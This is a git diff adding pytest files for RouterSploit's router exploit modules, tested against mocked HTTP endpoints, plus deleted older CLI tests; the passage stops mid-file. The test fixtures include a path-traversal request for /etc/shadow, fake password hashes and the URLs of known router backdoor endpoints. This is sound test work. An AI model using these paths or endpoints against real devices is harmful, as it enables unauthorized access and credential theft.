a/tests/exploits/routers/multi/__init__.py b/tests/exploits/routers/multi/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/multi/test_misfortune_cookie.py b/tests/exploits/routers/multi/test_misfortune_cookie.py new file mode 100644 index 000000000..4620c8b96 --- /dev/null +++ b/tests/exploits/routers/multi/test_misfortune_cookie.py @@ -0,0 +1,22 @@ +from flask import Response +from routersploit.modules.exploits.routers.multi.misfortune_cookie import Exploit + + +def apply_response(*args, **kwargs): + resp = Response("TEST omg1337hax TEST", status=404) + resp.headers["server"] = "RomPager" + return resp + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/test", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/__init__.py b/tests/exploits/routers/netgear/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/netgear/test_dgn1000_dgn2200_rce.py b/tests/exploits/routers/netgear/test_dgn1000_dgn2200_rce.py new file mode 100644 index 000000000..84e7efb34 --- /dev/null +++ b/tests/exploits/routers/netgear/test_dgn1000_dgn2200_rce.py @@ -0,0 +1,24 @@ +from flask import request +#from routersploit.modules.exploits.routers.netgear.dgn1000_dgn2200_rce import Exploit + + +def apply_response(*args, **kwargs): + res = request.args['cmd'] + data = "TEST" + res + "TEST" + return data, 200 + + +def test_check_success(target): + return + + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/setup.cgi", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_dgn2200_ping_cgi_rce.py b/tests/exploits/routers/netgear/test_dgn2200_ping_cgi_rce.py new file mode 100644 index 000000000..dc832da54 --- /dev/null +++ b/tests/exploits/routers/netgear/test_dgn2200_ping_cgi_rce.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.netgear.dgn2200_ping_cgi_rce import Exploit + + +def apply_response(*args, **kwargs): + res = request.form['ping_IPAddr'] + data = "" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.dgn2200_ping_cgi_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/ping.cgi", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_jnr1010_path_traversal.py b/tests/exploits/routers/netgear/test_jnr1010_path_traversal.py new file mode 100644 index 000000000..a8c87013e --- /dev/null +++ b/tests/exploits/routers/netgear/test_jnr1010_path_traversal.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.netgear.jnr1010_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/webproc", methods=["GET"]) + route_mock.return_value = ( + "#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_n300_auth_bypass.py b/tests/exploits/routers/netgear/test_n300_auth_bypass.py new file mode 100644 index 000000000..a476aa57a --- /dev/null +++ b/tests/exploits/routers/netgear/test_n300_auth_bypass.py @@ -0,0 +1,38 @@ +from flask import Response +from routersploit.modules.exploits.routers.netgear.n300_auth_bypass import Exploit + + +hit = False + + +def apply_response1(*args, **kwargs): + global hit + if hit is False: + resp = Response("TEST", status=401) + return resp + else: + resp = Response("TEST", status=200) + return resp + + +def apply_response2(*args, **kwargs): + global hit + hit = True + return "TEST", 200 + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock1 = target.get_route_mock("/", methods=["GET"]) + route_mock1.side_effect = apply_response1 + + route_mock2 = target.get_route_mock("/BRS_netgear_success.html", methods=["GET"]) + route_mock2.side_effect = apply_response2 + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_netgear_multi_rce.py b/tests/exploits/routers/netgear/test_netgear_multi_rce.py new file mode 100644 index 000000000..ee31099fd --- /dev/null +++ b/tests/exploits/routers/netgear/test_netgear_multi_rce.py @@ -0,0 +1,107 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.netgear.multi_rce import Exploit + + +def apply_response_v1(*args, **kwargs): + res = request.args['macAddress'] + data = "Update Success! TEST" + res + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.multi_rce.shell") +def test_exploit_v1_success(mocked_shell, target): + """ Test scenario - successful exploitation via method 1 """ + + route_mock = target.get_route_mock("/boardData102.php", methods=["GET"]) + route_mock.side_effect = apply_response_v1 + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + assert exploit.check() + assert exploit.run() is None + + +def apply_response_v2(*args, **kwargs): + res = request.args['macAddress'] + data = "Update Success! TEST" + res + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.multi_rce.shell") +def test_exploit_v2_success(mocked_shell, target): + """ Test scenario - successful exploitation via method 2 """ + + route_mock = target.get_route_mock("/boardDataNA.php", methods=["GET"]) + route_mock.side_effect = apply_response_v2 + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +def apply_response_v3(*args, **kwargs): + res = request.args['macAddress'] + data = "Update Success! TEST" + res + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.multi_rce.shell") +def test_exploit_v3_success(mocked_shell, target): + """ Test scenario - successful exploitation via method 3 """ + + route_mock = target.get_route_mock("/boardDataWW.php", methods=["GET"]) + route_mock.side_effect = apply_response_v3 + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +def apply_response_v4(*args, **kwargs): + res = request.args['macAddress'] + data = "Update Success! TEST" + res + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.multi_rce.shell") +def test_exploit_v4_success(mocked_shell, target): + """" Test scenario - successful exploitation via method 4 """ + + route_mock = target.get_route_mock("/boardDataJP.php", methods=["GET"]) + route_mock.side_effect = apply_response_v4 + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +def apply_response_v5(*args, **kwargs): + res = request.args['macAddress'] + data = "Update Success! TEST" + res + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.multi_rce.shell") +def test_exploit_v5_success(mocked_shell, target): + """ Test scenario - successful exploitation via method 5 """ + + route_mock = target.get_route_mock("/boardDataJP.php", methods=["GET"]) + route_mock.side_effect = apply_response_v5 + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_prosafe_rce.py b/tests/exploits/routers/netgear/test_prosafe_rce.py new file mode 100644 index 000000000..d69bfe014 --- /dev/null +++ b/tests/exploits/routers/netgear/test_prosafe_rce.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.netgear.prosafe_rce import Exploit + + +def apply_response(*args, **kwargs): + res = request.form["reqMethod"] + data = "TEST" + res + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.netgear.prosafe_rce.shell") +def test_exploit_success(mocked_shell, target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/login_handler.php", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_r7000_r6400_rce.py b/tests/exploits/routers/netgear/test_r7000_r6400_rce.py new file mode 100644 index 000000000..176acfc4d --- /dev/null +++ b/tests/exploits/routers/netgear/test_r7000_r6400_rce.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import Response +from routersploit.modules.exploits.routers.netgear.r7000_r6400_rce import Exploit + + +def apply_response(*args, **kwargs): + resp = Response("TEST", status=401) + resp.headers["WWW-Authenticate"] = "NETGEAR R7000" + return resp + + +@mock.patch("routersploit.modules.exploits.routers.netgear.r7000_r6400_rce.shell") +def test_exploit_success(mocked_shell, target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/", methods=["HEAD"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netgear/test_wnr500_612v3_jnr1010_2010_path_traversal.py b/tests/exploits/routers/netgear/test_wnr500_612v3_jnr1010_2010_path_traversal.py new file mode 100644 index 000000000..628fe5432 --- /dev/null +++ b/tests/exploits/routers/netgear/test_wnr500_612v3_jnr1010_2010_path_traversal.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.netgear.wnr500_612v3_jnr1010_2010_path_traversal import Exploit + + +def test_exploit_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/cgi-bin/webproc", methods=["GET"]) + route_mock.return_value = ( + "#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/netsys/__init__.py b/tests/exploits/routers/netsys/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/netsys/test_multi_rce.py b/tests/exploits/routers/netsys/test_multi_rce.py new file mode 100644 index 000000000..6abb73fa0 --- /dev/null +++ b/tests/exploits/routers/netsys/test_multi_rce.py @@ -0,0 +1,54 @@ +from unittest import mock +from routersploit.modules.exploits.routers.netsys.multi_rce import Exploit + + +etc_passwd = ( + "#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::" +) + + +@mock.patch("routersploit.modules.exploits.routers.netsys.multi_rce.shell") +def test_check_v1_success(mocked_shell, target): + """ Test scenario - successful check via method 1 """ + + route_mock = target.get_route_mock("/view/IPV6/ipv6networktool/traceroute/ping.php", methods=["GET"]) + route_mock.return_value = etc_passwd + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +@mock.patch("routersploit.modules.exploits.routers.netsys.multi_rce.shell") +def test_check_v2_success(mocked_shell, target): + """ Test scenario - successful check via method 2 """ + + route_mock = target.get_route_mock("/view/systemConfig/systemTool/ping/ping.php", methods=["GET"]) + route_mock.return_value = etc_passwd + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +@mock.patch("routersploit.modules.exploits.routers.netsys.multi_rce.shell") +def test_check_v3_success(mocked_shell, target): + """ Test scenario - successful check via method 3 """ + + route_mock = target.get_route_mock("/view/systemConfig/systemTool/traceRoute/traceroute.php", methods=["GET"]) + route_mock.return_value = etc_passwd + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/technicolor/__init__.py b/tests/exploits/routers/technicolor/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/technicolor/test_dwg855_authbypass.py b/tests/exploits/routers/technicolor/test_dwg855_authbypass.py new file mode 100644 index 000000000..d1897c1f2 --- /dev/null +++ b/tests/exploits/routers/technicolor/test_dwg855_authbypass.py @@ -0,0 +1,17 @@ +from routersploit.modules.exploits.routers.technicolor.dwg855_authbypass import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/logo.jpg", methods=["GET"]) + route_mock.return_value = ( + b"\x11\x44\x75\x63\x6b\x79\x00" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/technicolor/test_tc7200_password_disclosure.py b/tests/exploits/routers/technicolor/test_tc7200_password_disclosure.py new file mode 100644 index 000000000..bca2838ad --- /dev/null +++ b/tests/exploits/routers/technicolor/test_tc7200_password_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "0MLog" + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py b/tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py new file mode 100644 index 000000000..4d3600779 --- /dev/null +++ b/tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosure_v2 import Exploit + + +def test_check_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "MLog" + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/thomson/__init__.py b/tests/exploits/routers/thomson/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/thomson/test_twg850_password_disclosure.py b/tests/exploits/routers/thomson/test_twg850_password_disclosure.py new file mode 100644 index 000000000..4ae092384 --- /dev/null +++ b/tests/exploits/routers/thomson/test_twg850_password_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.thomson.twg850_password_disclosure import Exploit + + +def test_exploit_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/GatewaySettings.bin", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "0MLog" + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/tplink/__init__.py b/tests/exploits/routers/tplink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/tplink/test_archer_c2_c20i_rce.py b/tests/exploits/routers/tplink/test_archer_c2_c20i_rce.py new file mode 100644 index 000000000..a9925dfae --- /dev/null +++ b/tests/exploits/routers/tplink/test_archer_c2_c20i_rce.py @@ -0,0 +1,21 @@ +from unittest import mock +from routersploit.modules.exploits.routers.tplink.archer_c2_c20i_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.tplink.archer_c2_c20i_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi", methods=["POST"]) + route_mock.return_value = ( + "TEST" + "[error]0" + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py b/tests/exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py new file mode 100644 index 000000000..30507a753 --- /dev/null +++ b/tests/exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_backdoor import Exploit + + +def apply_response(*args, **kwargs): + cmd = request.args["cmd"] + data = 'TEST; var cmdResult = new Array(\n"'+cmd+'",\n0,0 ); TEST' + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_backdoor.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/userRpm/DebugResultRpm.htm", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/tplink/test_wdr740nd_wdr740n_path_traversal.py b/tests/exploits/routers/tplink/test_wdr740nd_wdr740n_path_traversal.py new file mode 100644 index 000000000..71ef6a1d4 --- /dev/null +++ b/tests/exploits/routers/tplink/test_wdr740nd_wdr740n_path_traversal.py @@ -0,0 +1,20 @@ +from routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/help/../../../../../../../../../../../../../../../../etc/shadow", methods=["GET"]) + route_mock.return_value = ( + "#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "Admin:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/tplink/test_wdr842nd_wdr842n_configure_disclosure.py b/tests/exploits/routers/tplink/test_wdr842nd_wdr842n_configure_disclosure.py new file mode 100644 index 000000000..27454149d --- /dev/null +++ b/tests/exploits/routers/tplink/test_wdr842nd_wdr842n_configure_disclosure.py @@ -0,0 +1,22 @@ +from flask import Response +from routersploit.modules.exploits.routers.tplink.wdr842nd_wdr842n_configure_disclosure import Exploit + + +def apply_response(*args, **kwargs): + resp = Response("TEST", status=200) + resp.headers['Content-Type'] = 'x-bin/octet-stream' + return resp + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/config.bin", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/zte/__init__.py b/tests/exploits/routers/zte/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/zte/test_f460_f660_backdoor.py b/tests/exploits/routers/zte/test_f460_f660_backdoor.py new file mode 100644 index 000000000..765106cf4 --- /dev/null +++ b/tests/exploits/routers/zte/test_f460_f660_backdoor.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.zte.f460_f660_backdoor import Exploit + + +def apply_response(*args, **kwargs): + cmd = request.form['Cmd'] + res = '' + return res, 200 + + +@mock.patch("routersploit.modules.exploits.routers.zte.f460_f660_backdoor.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/web_shell_cmd.gch", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/zte/test_zxv10_rce.py b/tests/exploits/routers/zte/test_zxv10_rce.py new file mode 100644 index 000000000..97ddaee7d --- /dev/null +++ b/tests/exploits/routers/zte/test_zxv10_rce.py @@ -0,0 +1,26 @@ +from unittest import mock +from routersploit.modules.exploits.routers.zte.zxv10_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.zte.zxv10_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock_v1 = target.get_route_mock("/", methods=["GET"]) + route_mock_v1.return_value = ( + "TEST" + "Frm_Logintoken\").value = \"(.*)\";" + "TEST" + ) + + route_mock_v2 = target.get_route_mock("/login.gch", methods=["POST"]) + route_mock_v2.return_value = ( + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/zyxel/__init__.py b/tests/exploits/routers/zyxel/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/zyxel/test_d1000_rce.py b/tests/exploits/routers/zyxel/test_d1000_rce.py new file mode 100644 index 000000000..e84568446 --- /dev/null +++ b/tests/exploits/routers/zyxel/test_d1000_rce.py @@ -0,0 +1,23 @@ +from unittest import mock +from flask import Response +from routersploit.modules.exploits.routers.zyxel.d1000_rce import Exploit + + +def apply_response(*args, **kwargs): + resp = Response("TEST home_wan.htm TEST", status=404) + return resp + + +@mock.patch("routersploit.modules.exploits.routers.zyxel.d1000_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/globe", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py b/tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py new file mode 100644 index 000000000..38d1df9f2 --- /dev/null +++ b/tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py @@ -0,0 +1,20 @@ +from routersploit.modules.exploits.routers.zyxel.d1000_wifi_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/UD/act", methods=["POST"]) + route_mock.return_value = ( + "TEST" + "Admin1234" + "TEST" + ) + + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py b/tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py new file mode 100644 index 000000000..d185ad5ea --- /dev/null +++ b/tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py @@ -0,0 +1,22 @@ +from unittest import mock +from routersploit.modules.exploits.routers.zyxel.p660hn_t_v1_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.zyxel.p660hn_t_v1_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/authorize.asp", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "ZyXEL P-660HN-T1A" + "TEST" + ) + + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py b/tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py new file mode 100644 index 000000000..135793f86 --- /dev/null +++ b/tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py @@ -0,0 +1,22 @@ +from unittest import mock +from routersploit.modules.exploits.routers.zyxel.p660hn_t_v2_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.zyxel.p660hn_t_v2_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/js/Multi_Language.js", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "P-660HN-T1A_IPv6" + "TEST" + ) + + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/test_case.py b/tests/test_case.py deleted file mode 100644 index 74c6fc1b8..000000000 --- a/tests/test_case.py +++ /dev/null @@ -1,31 +0,0 @@ -import logging -import unittest - -from routersploit.utils import NonStringIterable - -logging.getLogger().addHandler(logging.NullHandler()) - - -class RoutersploitTestCase(unittest.TestCase): - def assertIsDecorated(self, function, decorator_name): - try: - decorator_list = function.__decorators__ - except AttributeError: - decorator_list = [] - - self.assertIn( - decorator_name, - decorator_list, - msg="'{}' method should be decorated " - "with 'module_required'".format(function.__name__) - ) - - def assertIsSubset(self, subset, container): - [self.assertIn(element, container) for element in subset] - - def assertIsSequence(self, arg): - self.assertEqual( - True, - isinstance(arg, NonStringIterable), - "'{}' is not a sequence".format(arg) - ) diff --git a/tests/test_completer.py b/tests/test_completer.py deleted file mode 100644 index f9480ea3e..000000000 --- a/tests/test_completer.py +++ /dev/null @@ -1,272 +0,0 @@ -import os -import unittest - -import pexpect - -from tests.test_case import RoutersploitTestCase - - -class RoutersploitCompleterTest(RoutersploitTestCase): - def __init__(self, methodName='runTest'): - super(RoutersploitCompleterTest, self).__init__(methodName) - self.cli_path = os.path.abspath( - os.path.join(__file__, os.pardir, os.pardir, 'rsf.py') - ) - self.raw_prompt = ".+?rsf.+?\s>\s" - self.module_prompt = lambda x: ".+?rsf.+?\(.+?{}.+?\)\s>\s".format(x) - - def setUp(self): - self.rsf = pexpect.spawn('python {}'.format(self.cli_path)) - self.rsf.send('\r\n') - self.rsf.expect(self.raw_prompt, timeout=3) - - def tearDown(self): - self.rsf.terminate(force=True) - - def assertPrompt(self, *args): - """ Assert command prompt - - :param elements: - :return: - """ - value = '\s*?'.join(args) - self.rsf.expect(value, timeout=1) - - def set_module(self): - self.rsf.send("use creds/ftp_bruteforce\r\n") - self.assertPrompt(self.module_prompt('FTP Bruteforce')) - - def test_raw_commands_no_module(self): - self.rsf.send("\t\t") - self.assertPrompt( - 'exec', 'exit', 'help', 'search', 'show', 'use', '\r\n', - self.raw_prompt - ) - - def test_complete_use_raw(self): - self.rsf.send("u\t\t") - self.assertPrompt(self.raw_prompt, 'use ') - - def test_complete_use(self): - self.rsf.send("use \t\t") - self.assertPrompt( - "creds", "exploits", "payloads", "scanners", "\r\n", - self.raw_prompt, - 'use ' - ) - - def test_complete_use_creds(self): - self.rsf.send("use cr\t\t") - self.assertPrompt( - self.raw_prompt, - 'use creds/' - ) - - def test_complete_use_creds_2(self): - self.rsf.send("use creds/\t\t") - self.assertPrompt( - 'creds/http_basic_default' - ) - - def test_complete_use_exploits(self): - self.rsf.send("use ex\t\t") - self.assertPrompt( - self.raw_prompt, - 'use exploits/' - ) - - def test_complete_use_exploits_2(self): - self.rsf.send("use exploits/\t\t") - self.assertPrompt( - "exploits/cameras/", "exploits/misc/", "exploits/routers/", "\r\n", - self.raw_prompt - ) - - def test_complete_use_exploits_3(self): - self.rsf.send("use exploits/routers/dli\t") - self.assertPrompt( - self.raw_prompt, - 'use exploits/routers/dlink/' - ) - - def test_complete_use_exploits_4(self): - self.rsf.send("use exploits/routers/dlink/dir_300_320_\t\t\t") - self.assertPrompt( - 'exploits/routers/dlink/dir_300_320_615_auth_bypass' - ) - - def test_raw_commands_with_module(self): - self.set_module() - self.rsf.send("\t\t") - self.assertPrompt( - 'back', 'exec', 'help', 'search', 'setg', 'use', '\r\n', - 'check', 'exit', 'run', 'set', 'show', '\r\n', - self.module_prompt('FTP Bruteforce') - ) - - def test_complete_back_raw(self): - self.set_module() - self.rsf.send("b\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'back' - ) - - def test_complete_check_raw(self): - self.set_module() - self.rsf.send("c\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'check' - ) - - def test_complete_run_raw(self): - self.set_module() - self.rsf.send("r\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'run' - ) - - def test_complete_search(self): - self.set_module() - self.rsf.send("sea\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'search ', - ) - - def test_complete_set_raw(self): - self.set_module() - self.rsf.send("s\t\t") - self.assertPrompt( - 'search', 'set', 'setg', 'show', '\r\n', - self.module_prompt('FTP Bruteforce'), 's' - ) - - def test_complete_set_raw_2(self): - self.set_module() - self.rsf.send("se\t\t") - self.assertPrompt( - 'search', 'set', 'setg', '\r\n', - self.module_prompt('FTP Bruteforce'), - ) - - def test_complete_set_raw_3(self): - self.set_module() - self.rsf.send("set\t\t") - self.assertPrompt( - 'set', 'setg', '\r\n', - self.module_prompt('FTP Bruteforce'), - ) - - def test_complete_set(self): - self.set_module() - self.rsf.send("set \t\t") - self.assertPrompt( - 'passwords', 'stop_on_success', 'threads', 'verbosity', '\r\n', - 'port', 'target', 'usernames', '\r\n', - self.module_prompt('FTP Bruteforce'), 'set ', - ) - - def test_complete_set_2(self): - self.set_module() - self.rsf.send("set u\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'set usernames ', - ) - - def test_complete_setg(self): - self.set_module() - self.rsf.send("setg \t\t") - self.assertPrompt( - 'passwords', 'stop_on_success', 'threads', 'verbosity', '\r\n', - 'port', 'target', 'usernames', '\r\n', - self.module_prompt('FTP Bruteforce'), 'setg ', - ) - - def test_complete_setg_2(self): - self.set_module() - self.rsf.send("setg u\t\t") - self.assertPrompt( - self.module_prompt('FTP Bruteforce'), 'setg usernames ', - ) - - def test_complete_unsetg(self): - """ - Not present in completion if no global option is set - """ - self.set_module() - self.rsf.send("\t\t") - self.assertPrompt( - 'back', 'exec', 'help', 'search', 'setg', 'use', '\r\n', - 'check', 'exit', 'run', 'set', 'show', '\r\n', - self.module_prompt('FTP Bruteforce'), - ) - - def test_complete_unsetg_2(self): - """ - Available only when global options is set - """ - self.set_module() - self.rsf.send("setg target foo\r\n") - self.rsf.send("\t\t") - self.assertPrompt( - 'back', 'exec', 'help', 'search', 'setg', 'unsetg', '\r\n', - 'check', 'exit', 'run', 'set', 'show', 'use', '\r\n', - self.module_prompt('FTP Bruteforce'), 